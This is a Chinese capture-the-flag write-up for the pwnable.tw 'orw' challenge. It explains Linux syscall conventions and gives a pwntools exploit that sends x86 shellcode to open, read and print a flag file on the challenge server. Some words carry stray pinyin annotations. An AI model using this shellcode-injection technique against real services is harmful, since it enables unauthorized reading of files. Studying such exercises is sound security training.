• 考驗我們直接編寫shellcode的能力，這里注意

• 對于32位程序，應(yīng)調(diào)用int $0x80進入系統(tǒng)調(diào)用，將系統(tǒng)調(diào)用號傳入eax，各個參數(shù)按照ebx、ecx、edx的順序傳遞到寄存器中，系統(tǒng)調(diào)用返回值儲存到eax寄存器。

• 對于64位程序，應(yīng)調(diào)用syscall進入系統(tǒng)調(diào)用，將系統(tǒng)調(diào)用號傳入rax，各個參數(shù)按照rdi、rsi、rdx的順序傳遞到寄存器中，系統(tǒng)調(diào)用返回值儲存到rax寄存器。

exp:

from pwn import *

context.binary = './orw'

#p = process('./orw')
p = remote('chall.pwnable.tw', 10001)

shellcode = asm(
                #fd = open('/home/orw/flag',0)
                '''
                push 0x00006761;
                push 0x6c662f77;
                push 0x726f2f65;
                push 0x6d6f682f;
                mov ecx, 0x0;
                mov ebx, esp;
                mov eax, 0x5;
                int 0x80;
                '''

                #read(fd,bss+0x200,0x40)
                '''
                mov ebx, eax;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x3;
                int 0x80;
                '''

                #write(1,bss+0x200,0x40)
                '''
                mov ebx, 0x1;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x4;
                int 0x80;
                '''
                )
p.sendline(shellcode)


p.interactive()

參考文章：

• https://stackoverflow.com/questions/12806584/what-is-better-int-0x80-or-syscall
• https://stackoverflow.com/questions/15598700/syscall-or-sysenter-on-32-bits-linux
• http://www.itkeyword.com/doc/045658890091729869/linux-asm-syscall